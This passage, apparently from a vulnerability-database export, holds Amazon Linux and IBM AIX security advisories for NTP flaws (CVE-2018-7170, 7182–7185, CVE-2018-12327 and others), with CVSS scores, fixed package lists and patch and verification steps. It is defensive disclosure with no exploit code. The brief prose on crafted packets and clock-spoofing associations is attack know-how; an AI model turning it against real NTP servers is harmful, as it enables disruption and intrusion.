association.([CVE-2018-7185 __](<https://access.redhat.com/security/cve/CVE-2018-7185>))\n\ndecodearr() can write beyond its buffer limit \nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.([CVE-2018-7183 __](<https://access.redhat.com/security/cve/CVE-2018-7183>))\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ntpdate-4.2.8p11-1.37.amzn1.i686 \n ntp-4.2.8p11-1.37.amzn1.i686 \n ntp-debuginfo-4.2.8p11-1.37.amzn1.i686 \n \n noarch: \n ntp-doc-4.2.8p11-1.37.amzn1.noarch \n ntp-perl-4.2.8p11-1.37.amzn1.noarch \n \n src: \n ntp-4.2.8p11-1.37.amzn1.src \n \n x86_64: \n ntpdate-4.2.8p11-1.37.amzn1.x86_64 \n ntp-4.2.8p11-1.37.amzn1.x86_64 \n ntp-debuginfo-4.2.8p11-1.37.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2018-05-10T17:01:00", "published": "2018-05-10T17:01:00", "id": "ALAS-2018-1009", "href": "https://alas.aws.amazon.com/ALAS-2018-1009.html", "title": "Medium: ntp", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:34:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2016-9311", "CVE-2015-7704", "CVE-2016-7433", "CVE-2018-7185", "CVE-2018-7183", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-9310", "CVE-2018-7170", "CVE-2016-1549", "CVE-2017-6464", "CVE-2018-7182", "CVE-2016-7426"], "description": "**Issue Overview:**\n\nEphemeral association time spoofing additional protection \nntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim&#x27;s clock via a Sybil attack. This issue exists because of an incomplete fix for [CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>).([CVE-2018-7170 __](<https://access.redhat.com/security/cve/CVE-2018-7170>))\n\nInterleaved symmetric mode cannot recover from bad state \nntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the &quot;received&quot; timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for [CVE-2015-7704 __](<https://access.redhat.com/security/cve/CVE-2015-7704>).([CVE-2018-7184 __](<https://access.redhat.com/security/cve/CVE-2018-7184>))\n\nEphemeral association time spoofing \nA malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win the clock selection algorithm in ntpd in NTP 4.2.8p4 and earlier and NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 and a5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim&#x27;s clock.([CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>))\n\nBuffer read overrun leads information leak in ctl_getitem() \nThe ctl_getitem method in ntpd in ntp-4.2.8p6 before 4.2.8p11 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted mode 6 packet with a ntpd instance from 4.2.8p6 through 4.2.8p10. ([CVE-2018-7182 __](<https://access.redhat.com/security/cve/CVE-2018-7182>))\n\nUnauthenticated packet can reset authenticated interleaved association \nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the &quot;other side&quot; of an interleaved association causing the victim ntpd to reset its association.([CVE-2018-7185 __](<https://access.redhat.com/security/cve/CVE-2018-7185>))\n\ndecodearr() can write beyond its buffer limit \nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.([CVE-2018-7183 __](<https://access.redhat.com/security/cve/CVE-2018-7183>))\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n ntp-perl-4.2.6p5-28.amzn2.2.1.noarch \n ntp-doc-4.2.6p5-28.amzn2.2.1.noarch \n \n src: \n ntp-4.2.6p5-28.amzn2.2.1.src \n \n x86_64: \n ntp-4.2.6p5-28.amzn2.2.1.x86_64 \n ntpdate-4.2.6p5-28.amzn2.2.1.x86_64 \n sntp-4.2.6p5-28.amzn2.2.1.x86_64 \n ntp-debuginfo-4.2.6p5-28.amzn2.2.1.x86_64 \n \n \n", "edition": 1, "modified": "2018-05-10T17:11:00", "published": "2018-05-10T17:11:00", "id": "ALAS2-2018-1009", "href": "https://alas.aws.amazon.com/AL2/ALAS-2018-1009.html", "title": "Medium: ntp", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:35:28", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170", "CVE-2016-1549"], "description": "**Issue Overview:**\n\nntpd in ntp 4.2.x before 4.2.8p7 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim&#x27;s clock via a Sybil attack. This issue exists because of an incomplete fix for [CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>).([CVE-2018-7170 __](<https://access.redhat.com/security/cve/CVE-2018-7170>))\n\nThe ntpq and ntpdc command-line utilities that are part of ntp package are vulnerable to stack-based buffer overflow via crafted hostname. Applications using these vulnerable utilities with an untrusted input may be potentially exploited, resulting in a crash or arbitrary code execution under privileges of that application.([CVE-2018-12327 __](<https://access.redhat.com/security/cve/CVE-2018-12327>))\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ntpdate-4.2.8p12-1.39.amzn1.i686 \n ntp-4.2.8p12-1.39.amzn1.i686 \n ntp-debuginfo-4.2.8p12-1.39.amzn1.i686 \n \n noarch: \n ntp-perl-4.2.8p12-1.39.amzn1.noarch \n ntp-doc-4.2.8p12-1.39.amzn1.noarch \n \n src: \n ntp-4.2.8p12-1.39.amzn1.src \n \n x86_64: \n ntp-debuginfo-4.2.8p12-1.39.amzn1.x86_64 \n ntp-4.2.8p12-1.39.amzn1.x86_64 \n ntpdate-4.2.8p12-1.39.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2018-09-19T17:19:00", "published": "2018-09-19T17:19:00", "id": "ALAS-2018-1083", "href": "https://alas.aws.amazon.com/ALAS-2018-1083.html", "title": "Low: ntp", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "aix": [{"lastseen": "2020-04-22T00:52:09", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2014-5209", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Tue Aug 14 14:48:57 CDT 2018\n\nThe most recent version of this document is available here:\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc\n\nSecurity Bulletin: Vulnerabilities in NTP affect AIX\n\n===============================================================================\n\nSUMMARY:\n\n There are multiple vulnerabilities in NTPv3 and NTPv4 that affect AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n NTPv3 is vulnerable to:\n\n CVEID: CVE-2014-5209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5209\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5209\n DESCRIPTION: NTP could allow a remote attacker to obtain sensitive \n information. By sending a GET_RESTRICT control message, an attacker \n could exploit this vulnerability to obtain internal or alternative \n IP addresses and other sensitive information.\n CVSS Base Score: 5.0\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/95841\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n NTPv3 and NTPv4 are vulnerable to:\n\n CVEID: CVE-2018-7182\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n DESCRIPTION: NTP could allow a remote attacker to obtain sensitive \n information, caused by a leak in the ctl_getitem() function. By \n sending a specially crafted mode 6 packet, an attacker could exploit \n this vulnerability to read past the end of its buffer.\n CVSS Base Score: 5.3 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/139785\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n CVEID: CVE-2018-7183\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7183\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7183\n DESCRIPTION: NTP is vulnerable to a buffer overflow, caused by improper \n bounds checking by the decodearr function. By leveraging an ntpq \n query and sending a response with a crafted array, a remote attacker \n could overflow a buffer and execute arbitrary code on the system or \n cause the application to crash.\n CVSS Base Score: 5.6\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/140092\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n NTPv4 is vulnerable to:\n\n CVEID: CVE-2018-7170\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n DESCRIPTION: NTP could allow a remote authenticated attacker to bypass \n security restrictions, caused by a Sybil attack. By creating many \n ephemeral associations, an attacker could exploit this vulnerability \n to win the clock selection of ntpd and modify a victim's clock. \n CVSS Base Score: 3.1\n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/139786\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\n CVEID: CVE-2018-7184\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n DESCRIPTION: NTP is vulnerable to a denial of service, caused by the \n failure of the interleaved symmetric mode to recover from bad state. \n By sending specially crafted packets, a remote authenticated \n attacker could exploit this vulnerability to cause a denial of \n service.\n CVSS Base Score: 3.1\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/139784\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L)\n\n CVEID: CVE-2018-7185\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n DESCRIPTION: NTP is vulnerable to a denial of service. By sending \n specially crafted packets, a remote authenticated attacker could \n exploit this vulnerability to reset authenticated interleaved \n association.\n CVSS Base Score: 3.1\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/139783\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L)\n\n CVEID: CVE-2016-1549\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n DESCRIPTION: NTP could allow a remote authenticated attacker to \n bypass security restrictions, caused by the failure to prevent \n Sybil attacks from authenticated peers. By creating multiple \n ephemeral associations to win the clock selection of ntpd, an \n attacker could exploit this vulnerability to modify a victim's \n clock.\n CVSS Base Score: 5.3 \n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/112741 \n for the current score \n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x \n\n The vulnerabilities in the following filesets are being addressed:\n \n key_fileset = aix\n\n For NTPv3:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S) \n ---------------------------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs NTPv3\n bos.net.tcp.client 6.1.9.0 6.1.9.315 key_w_fs NTPv3\n bos.net.tcp.client 7.1.4.0 7.1.4.33 key_w_fs NTPv3\n bos.net.tcp.client 7.1.5.0 7.1.5.15 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.0.0 7.2.0.4 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.1.0 7.2.1.2 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.2.0 7.2.2.15 key_w_fs NTPv3\n\n For NTPv4:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S)\n ---------------------------------------------------------------------\n ntp.rte 7.4.2.8100 7.4.2.8100 key_w_fs NTPv4 \n\n \n To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client\n\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n For NTPv3:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 5.3.12 IJ06657 ** N/A key_w_apar NTPv3\n 6.1.9 IJ06651 ** SP12 key_w_apar NTPv3\n 7.1.4 IJ06652 ** SP7 key_w_apar NTPv3\n 7.1.5 IJ06653 ** SP3 key_w_apar NTPv3\n 7.2.0 IJ06654 ** N/A key_w_apar NTPv3\n 7.2.1 IJ06655 ** SP5 key_w_apar NTPv3\n 7.2.2 IJ06656 ** SP3 key_w_apar NTPv3\n\n VIOS Level APAR Availability SP KEY PRODUCT(S)\n ----------------------------------------------------------------\n 2.2.4 IJ06651 ** N/A key_w_apar NTPv3\n 2.2.5 IJ06651 ** 2.2.5.50 key_w_apar NTPv3\n 2.2.6 IJ06651 ** 2.2.6.30 key_w_apar NTPv3\n\n For NTPv4:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.9 IJ06400 ** SP12 key_w_apar NTPv4\n 7.1.4 IJ06400 ** SP7 key_w_apar NTPv4\n 7.1.5 IJ06400 ** SP3 key_w_apar NTPv4\n 7.2.0 IJ06400 ** N/A key_w_apar NTPv4\n 7.2.1 IJ06400 ** SP5 key_w_apar NTPv4\n 7.2.2 IJ06400 ** SP3 key_w_apar NTPv4\n\n VIOS Level APAR Availability SP KEY PRODUCT(S)\n ----------------------------------------------------------------\n 2.2.4 IJ06400 ** N/A key_w_apar NTPv4\n 2.2.5 IJ06400 ** 2.2.5.50 key_w_apar NTPv4\n 2.2.6 IJ06400 ** 2.2.6.30 key_w_apar NTPv4\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06400\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06651\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06652\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06653\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06654\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06655\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06656\n\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06400\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06651\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06652\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06653\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06654\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06655\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06656\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n AIX and VIOS fixes are available.\n\n The AIX/VIOS fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix10.tar\n http://aix.software.ibm.com/aix/efixes/security/ntp_fix10.tar\n https://aix.software.ibm.com/aix/efixes/security/ntp_fix10.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n For NTPv3:\n \n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 5.3.12.9 IJ06657m9a.180529.epkg.Z key_w_fix NTPv3\n 6.1.9.9 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 6.1.9.10 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 6.1.9.11 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 7.1.4.4 IJ06652m4a.180528.epkg.Z key_w_fix NTPv3\n 7.1.4.5 IJ06652m4a.180528.epkg.Z key_w_fix NTPv3\n 7.1.4.6 IJ06652m4a.180528.epkg.Z key_w_fix NTPv3\n 7.1.5.0 IJ06653m0a.180527.epkg.Z key_w_fix NTPv3\n 7.1.5.1 IJ06653m0a.180527.epkg.Z key_w_fix NTPv3\n 7.1.5.2 IJ06653m0a.180527.epkg.Z key_w_fix NTPv3\n 7.2.0.4 IJ06654m4a.180527.epkg.Z key_w_fix NTPv3\n 7.2.0.5 IJ06654m4a.180527.epkg.Z key_w_fix NTPv3\n 7.2.0.6 IJ06654m4a.180527.epkg.Z key_w_fix NTPv3\n 7.2.1.2 IJ06655m2a.180527.epkg.Z key_w_fix NTPv3\n 7.2.1.3 IJ06655m2a.180527.epkg.Z key_w_fix NTPv3\n 7.2.1.4 IJ06655m2a.180527.epkg.Z key_w_fix NTPv3\n 7.2.2.0 IJ06656m0a.180527.epkg.Z key_w_fix NTPv3\n 7.2.2.1 IJ06656m0a.180527.epkg.Z key_w_fix NTPv3\n 7.2.2.2 IJ06656m0a.180527.epkg.Z key_w_fix NTPv3\n\n Please note that the above table refers to AIX TL/SP level as\n opposed to fileset level, i.e., 7.2.2.2 is AIX 7200-02-02.\n\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.4.40 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.4.50 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.4.60 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.5.20 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.5.30 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.5.40 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.6.0 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.6.10 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.6.2x IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n\n\n For NTPv4:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.x IJ06400s9a.180514.epkg.Z key_w_fix NTPv4\n 7.1.x IJ06400s9a.180514.epkg.Z key_w_fix NTPv4\n 7.2.x IJ06400s9a.180514.epkg.Z key_w_fix NTPv4\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.x IJ06400s9a.180514.epkg.Z key_w_fix NTPv4\n\n To extract the fixes from the tar file:\n\n tar xvf ntp_fix10.tar \n cd ntp_fix10\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 456eefb0975171e71cedd71431b6e23ebf16b226c4344a34b9c6452cb862fc42 IJ06400s9a.180514.epkg.Z key_w_csum\n e17cc1dc210f3b8f802d4b52cda05f1a89cd6de2cea371e9a7bea5452dd686f5 IJ06651m9a.180528.epkg.Z key_w_csum\n 3c92a6063d36be79cd716843fc8221f96911922a62b91a20e86d10ead054255a IJ06652m4a.180528.epkg.Z key_w_csum\n 17f7a37fedba73dd7e3862ced003436b22c5b74c7ca8dcc0dcde3306cff0d64f IJ06653m0a.180527.epkg.Z key_w_csum\n 7792b56540634644b2fb9b47a8d5449eb62a89ea83e965e265d5b3fe3a2d01bd IJ06654m4a.180527.epkg.Z key_w_csum\n 223874b300b8a4201c6f6cdc0eb53bc09e4c22f9f00902713143b3df3569e0c0 IJ06655m2a.180527.epkg.Z key_w_csum\n f0e0c59274a89dc18064f8e49d4fa47de870e94b3b2d84d841f2e41c890cd035 IJ06656m0a.180527.epkg.Z key_w_csum\n 4a8e6ba8e5f5bf6651c339ee8ccffbcf6cd50f5004f1598d0ac70ecfe58ee823 IJ06657m9a.180529.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM Support at\n http://ibm.com/support/ and describe the discrepancy. \n \n openssl dgst -sha1 -verify [pubkey_file] -signature [advisory_file].sig [advisory_file]\n \n openssl dgst -sha1 -verify [pubkey_file] -signature [ifix_file].sig [ifix_file]\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n If possible, it is recommended that a mksysb backup of the system \n be created. Verify it is both bootable and readable before\n proceeding.\n\n The fix will not take affect until any running xntpd servers\n have been stopped and restarted with the following commands:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n After installation the ntp daemon must be restarted:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n ftp://ftp.software.ibm.com/systems/power/AIX/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n IBM Secure Engineering Web Portal\n http://www.ibm.com/security/secure-engineering/bulletins.html\n\n IBM Product Security Incident Response Blog\n https://www.ibm.com/blogs/psirt/\n\n Security Bulletin: Vulnerabilities in NTP affect AIX \n https://www-01.ibm.com/support/docview.wss?uid=ibm10718835\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Tue Aug 14 14:48:57 CDT 2018\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n\n", "edition": 15, "modified": "2018-08-14T14:48:57", "published": "2018-08-14T14:48:57", "id": "NTP_ADVISORY10.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc", "title": "Vulnerabilities in NTP affect AIX,Vulnerabilities in NTP affect VIOS", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Fri Dec 14 12:20:13 CST 2018\n\nThe most recent version of this document is available here:\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc\n\nSecurity Bulletin: Vulnerabilities in NTPv4 affect AIX (CVE-2018-12327, \n CVE-2018-7170)\n\n===============================================================================\n\nSUMMARY:\n\n There are vulnerabilities in NTPv4 that affect AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n NTPv4 is vulnerable to:\n\n CVEID: CVE-2018-12327\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12327\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12327\n DESCRIPTION: NTP is vulnerable to a stack-based buffer overflow, caused \n by improper bounds checking by ntpq and ntpdc. By sending an overly \n long string argument, a local attacker could overflow a buffer and \n execute arbitrary code on the system with elevated privileges or \n cause the application to crash.\n CVSS Base Score: 5.9\n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/145120\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n CVEID: CVE-2018-7170\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n DESCRIPTION: NTP could allow a remote authenticated attacker to bypass \n security restrictions, caused by a Sybil attack. By creating many \n ephemeral associations, an attacker could exploit this vulnerability \n to win the clock selection of ntpd and modify a victim's clock. \n CVSS Base Score: 3.1\n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/139786\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 6.1, 7.1, 7.2\n VIOS 2.2.x \n\n The vulnerabilities in the following filesets are being addressed:\n \n key_fileset = aix\n\n For NTPv4:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S)\n ---------------------------------------------------------------------\n ntp.rte 7.4.2.8100 7.4.2.8110 key_w_fs NTPv4\n\n \n To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i ntp.rte\n\n\n REMEDIATION:\n\n FIXES\n\n AIX and VIOS fixes are available.\n\n The AIX/VIOS fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix11.tar\n http://aix.software.ibm.com/aix/efixes/security/ntp_fix11.tar\n https://aix.software.ibm.com/aix/efixes/security/ntp_fix11.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n For NTPv4:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.x IJ10280s3b.181206.epkg.Z key_w_fix NTPv4\n 7.1.x IJ10280s3b.181206.epkg.Z key_w_fix NTPv4\n 7.2.x IJ10280s3b.181206.epkg.Z key_w_fix NTPv4\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.x IJ10280s3b.181206.epkg.Z key_w_fix NTPv4\n\n To extract the fixes from the tar file:\n\n tar xvf ntp_fix11.tar \n cd ntp_fix11\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 